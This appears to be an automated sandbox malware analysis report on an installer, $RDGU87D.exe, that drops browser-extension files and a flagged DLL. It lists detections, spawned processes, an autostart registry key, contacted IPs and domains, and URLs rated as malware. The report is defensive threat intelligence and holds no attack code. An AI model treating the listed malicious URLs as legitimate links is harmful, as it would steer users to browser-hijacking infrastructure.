48 reg.exe 35->48         started        75 239.255.255.250 unknown Reserved 38->75 50 chrome.exe 2 38->50         started        53 xcopy.exe 12 38->53         started        signatures16 process17 dnsIp18 91 Creates an undocumented autostart registry key 45->91 69 api4.ipify.org 64.185.227.155, 443, 49197 WEBNXUS United States 50->69 71 46-105-201-240.any.cdn.anycast.me 46.105.201.240, 443, 49206 OVHFR France 50->71 73 17 other IPs or domains 50->73 signatures19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
$RDGU87D.exe47%ReversingLabsWin32.PUA.Presenoker
$RDGU87D.exe60%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2065N.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp0%ReversingLabs
C:\Windows\System32\is-T05I8.tmp42%ReversingLabsWin64.Trojan.Generic
C:\Windows\system32\sxsshell.dll (copy)42%ReversingLabsWin64.Trojan.Generic
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ocsps.ssl.com00%URL Reputationsafe
https://smashbrowser.com1%VirustotalBrowse
https://www.remobjects.com/ps0%URL Reputationsafe
https://www.innosetup.com/0%URL Reputationsafe
https://searchesmia.com/bingchr4?q=100%Avira URL Cloudmalware
https://smashbrowser.com/welcome2.phpl0%Avira URL Cloudsafe
https://smashbrowser.com0%Avira URL Cloudsafe
https://offerszzzz.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL0%Avira URL Cloudsafe
https://chrome.comiR0%Avira URL Cloudsafe
https://smashaff.com/redirect?&url=100%Avira URL Cloudmalware
https://chrome.com$https://chrome.com$https://chrome.com0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php-10%Avira URL Cloudsafe
https://chrome.com1R0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpA0%Avira URL Cloudsafe
https://chrome.com9P0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.phpO0%Avira URL Cloudsafe
https://getfiles.wiki/favicon.ico0%Avira URL Cloudsafe
https://getfiles.wiki/redirect.php0%Avira URL Cloudsafe
https://offersss.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.url0%Avira URL Cloudsafe
https://exturl.com/r.php?key=pvwarw30%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php2F0%Avira URL Cloudsafe
https://smashbrowser.com/welcome2.php0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
smashbrowser.com
188.114.97.3
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      accounts.google.com
      172.217.168.77
      truefalse
        high
        api4.ipify.org
        64.185.227.155
        truefalse
          high
          c-0001.c-msedge.net
          13.107.4.50
          truefalse
            unknown
            getfiles.wiki
            188.114.97.3
            truefalse
              unknown
              t.dtscout.com
              141.101.120.11
              truefalse
                high
                offerszzzz.click
                38.128.66.115
                truefalse
                  unknown
                  46-105-201-240.any.cdn.anycast.me
                  46.105.201.240
                  truefalse
                    unknown
                    ocsps.ssl.com
                    100.24.223.135
                    truefalse
                      high
                      s4.histats.com
                      54.39.156.32
                      truefalse
                        high
                        e.dtscout.com
                        141.101.120.11
                        truefalse
                          high
                          clients.l.google.com
                          142.250.203.110
                          truefalse
                            high
                            offersss.click
                            38.128.66.115
                            truefalse
                              unknown
                              exturl.com
                              38.128.66.115
                              truefalse
                                unknown
                                clients2.google.com
                                unknown
                                unknownfalse
                                  high
                                  api.ipify.org
                                  unknown
                                  unknownfalse
                                    high
                                    s10.histats.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=false
                                        unknown
                                        https://offerszzzz.click/r.php?payout=OPTIONAL&cnv_id=OPTIONALfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.ipify.org/?format=jsonp&callback=getIPfalse
                                          high
                                          https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                            high
                                            https://s10.histats.com/js15_as.jsfalse
                                              high
                                              https://a.nel.cloudflare.com/report/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwbfalse
                                                high
                                                https://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.phpfalse
                                                  high
                                                  https://t.dtscout.com/pv/?_a=v&_h=getfiles.wiki&_ss=44fghon7au&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=63lw&_cb=_dtspv.cfalse
                                                    high
                                                    https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=false
                                                      unknown
                                                      https://getfiles.wiki/favicon.icofalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://offersss.click/r.php?payout=OPTIONAL&cnv_id=OPTIONALfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://getfiles.wiki/redirect.phpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1679430047893&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:197652976&@b3:1679430048&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&@wfalse
                                                        high
                                                        https://exturl.com/r.php?key=pvwarw3false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26ucfalse
                                                          high
                                                          https://s4.histats.com/stats/e.php?4708787&@Ab&@R40431&@wfalse
                                                            high
                                                            https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                                              high
                                                              https://smashbrowser.com/welcome2.phpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU$RDGU87D.exefalse
                                                                high
                                                                https://searchesmia.com/bingchr4?q=xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.drtrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://smashbrowser.com/welcome2.phpl$RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://smashbrowser.com$RDGU87D.tmp, 00000004.00000003.931574561.0000000002046000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • 1%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.inkscape.org/)xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drfalse
                                                                  high
                                                                  http://ocsps.ssl.com0$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exefalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exefalse
                                                                    high
                                                                    http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exefalse
                                                                      high
                                                                      https://chrome.comiR$RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://creativecommons.org/ns#xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drfalse
                                                                        high
                                                                        https://smashaff.com/redirect?&url=xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.drtrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exefalse
                                                                          high
                                                                          https://chrome.com$https://chrome.com$https://chrome.com$RDGU87D.exe, 00000001.00000003.914790721.00000000022D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          https://smashbrowser.com/welcome2.phpO$RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://chrome.com1R$RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://smashbrowser.com/welcome2.phpL$RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtdxcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drfalse
                                                                              high
                                                                              https://www.remobjects.com/ps$RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://chrome.com9P$RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://smashbrowser.com/welcome2.php-1$RDGU87D.tmp, 00000004.00000003.932375476.000000000036B000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.innosetup.com/$RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.ssl.com/repository0$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exefalse
                                                                                high
                                                                                https://chrome.com$RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://smashbrowser.com/welcome2.phpA$RDGU87D.tmp, 00000004.00000003.932595838.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933214226.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.000000000204D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://smashbrowser.com/welcome2.url$RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exefalse
                                                                                    high
                                                                                    http://www.inkscape.org/namespaces/inkscapexcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drfalse
                                                                                      high
                                                                                      https://smashbrowser.com/welcome2.php2F$RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      141.101.120.11
                                                                                      t.dtscout.comEuropean Union
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      54.39.156.32
                                                                                      s4.histats.comCanada
                                                                                      16276OVHFRfalse
                                                                                      38.128.66.115
                                                                                      offerszzzz.clickUnited States
                                                                                      63023AS-GLOBALTELEHOSTUSfalse
                                                                                      142.250.203.110
                                                                                      clients.l.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      239.255.255.250
                                                                                      unknownReserved
                                                                                      unknownunknownfalse
                                                                                      188.114.97.3
                                                                                      smashbrowser.comEuropean Union
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      172.217.168.77
                                                                                      accounts.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      64.185.227.155
                                                                                      api4.ipify.orgUnited States
                                                                                      18450WEBNXUSfalse
                                                                                      35.190.80.1
                                                                                      a.nel.cloudflare.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      46.105.201.240
                                                                                      46-105-201-240.any.cdn.anycast.meFrance
                                                                                      16276OVHFRfalse
                                                                                      IP
                                                                                      192.168.2.255
                                                                                      127.0.0.1
                                                                                      Joe Sandbox Version:37.0.0 Beryl
                                                                                      Analysis ID:831395
                                                                                      Start date and time:2023-03-21 13:19:26 +01:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 31s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:36
                                                                                      Number of new started drivers analysed:2
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample file name:$RDGU87D.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal40.bank.winEXE@62/71@15/12
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 100% (good quality ratio 46.2%)
                                                                                      • Quality average: 40.9%
                                                                                      • Quality standard deviation: 46.9%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 1
                                                                                      • Number of non-executed functions: 5
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 8.238.189.126, 8.241.126.121, 8.248.115.254, 8.238.85.126, 8.248.147.254, 142.250.203.99, 34.104.35.123, 172.217.168.67
                                                                                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, edgedl.me.gvt1.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.gstatic.com, wu-bg-shim.trafficmanager.net
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                      TimeTypeDescription
                                                                                      13:20:25API Interceptor53x Sleep call for process: $RDGU87D.tmp modified
                                                                                      13:20:27API Interceptor18x Sleep call for process: taskkill.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      141.101.120.11http://s953497062.onlinehome.us/fixit?_recovrAccountGet hashmaliciousUnknownBrowse
                                                                                        https://gun.arsu.site/signup.php?sub=gujis&sa=D&sntz=1&usg=AOvVaw2YyL-B_7tcDvlUKNR1lBF1Get hashmaliciousUnknownBrowse
                                                                                          Your File Is Ready To Download.exeGet hashmaliciousUnknownBrowse
                                                                                            https://s3.amazonaws.com/tdgnfbrdtykmhgna1bgmhgcfrtjrcfgtmykuhfgfnfjcfhcgncgdfxhn86/9ijhgfsdgfh.htmlGet hashmaliciousUnknownBrowse
                                                                                              https://sdfsdfsdfsdf.nevely.click/txoxETMPGet hashmaliciousUnknownBrowse
                                                                                                54.39.156.32$RLFVMMG.exeGet hashmaliciousUnknownBrowse
                                                                                                  inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                                    38.128.66.115$RLFVMMG.exeGet hashmaliciousUnknownBrowse
                                                                                                      inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                                        inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                                          inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                                            inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                                              inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                                                Your File Is Ready To Download.exeGet hashmaliciousUnknownBrowse
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  api4.ipify.orgZe2UurUp2E.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 64.185.227.155
                                                                                                                  j1DSkpr0mb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 64.185.227.155
                                                                                                                  Proforma_PL.xlsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  Ziraat_Bankas#U0131_Swift_Mesaj#U0131_(8).exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  DHL_Original_Shipment_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.237.62.211
                                                                                                                  zqwioujj.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  http://go.onelink.me/107872968?pid=InProduct&c=Global_Internal_YGrowth_AndroidEmailSig__AndroidUsers&af_wl=ym&af_sub1=Internal&af_sub2=Global_YGrowth&af_sub3=EmailSignature&af_web_dp=http://hyww.15.snowrainbd.com/kw7tb2mo%20#tj_base64_encode%20aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL2FwcGZvcmVzdF91Zi9mMTY3OTMxMjkxMDAxOXg2MjY5MTMxOTcxODkwODMxMDAvY29sZS5odG1s?em=ventas@seaboardmarine.com.ni%22Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.237.62.211
                                                                                                                  T4oIN41uUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 64.185.227.155
                                                                                                                  izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  Q4YODvoYjL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 64.185.227.155
                                                                                                                  CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.237.62.211
                                                                                                                  cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 64.185.227.155
                                                                                                                  FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 64.185.227.155
                                                                                                                  DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.237.62.211
                                                                                                                  TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 173.231.16.76
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUSmj3Lf2ulDf.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  https://t.sidekickopen86.com/s3t/c/5/f18dQhb0V1-gmb8c7SZ_W1x1Wk359hl3kW7_k2841CX6NGW36Q28R1D8_RCVv6xCD11t9-sf197v5Y04?te=W3R5hFj4cm2zwW3Kb3pK1T_bFpW3M1YQr41TRgPW45TRgW3K2B2XW43Tw8Z4hMntNW43SfLS43T4N9W4hLywB3R5hFjW4cbjZB1mp7wVW1SbD6w4fG967W3T3qd41GF81sW4cKgQM3K7-PpW41Yswk43T3VxW2zpLjf43j6YSW1mp7y51mp7ygW3K8R4L41PFX7W1SbFxy3K3p__W3_QfJp3_X5XxW3SYLpP3T1MdGW49HRqW4cFxKwW3_m1SR2xZ8D8W43WhFN45vScwW4fykN22FY-vmW4rzN743g0nzVW3XFZV13K5WpgW4fD5rY2vLKG4W3_JkBy2zWlrXW2vMsC9327xbYW3zdyqG3H3bCkW2dLp8t2120KSW1mrcDQ2125hqW1N5bQ43JKGc-W3H4lnW3GJ6mnW1Y_53P3H3wh3W1N4mzM25fdWBW2s-jZn3DKzB-W21j9B33JH_83W1Z0NBt3H35pLW3BLCyh1Qsz5DW24MF5S1M_KB9W1M_KB91-YRkwW1X2dfL1X1P_vW1V1BHr1V0kbLW2sT8Np41WvysW1mrcFH3bbSV-W2CPrBR1VpB4NW4rk2JQ3W0hhLW2sCrVK3VG8J7W2vHnkK2sNx_mW3W0hhW1SvsLmW4thcjM2sNwHsW3SLSgN3Xw1hwW3bBdxd2sNyCPW2sN47Q41q7qZW2vsFFV1M_KB9W1mrcDQ211_TkW3_Ygfy3H3bCkW2f1gbs3jvpvFW41K4dB3XDCd4W254cSg25fkyKW2KD0x51Sby4tW3W3_m71S8SN8W2zvP9l45WvP3W3QNggB2vt6RpW45rYrc4cJ2Vxf3K2WHM04&si=8000000026898251&pi=0b755dfe-788c-4ae6-a229-0f4bcd270698Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.64.145.69
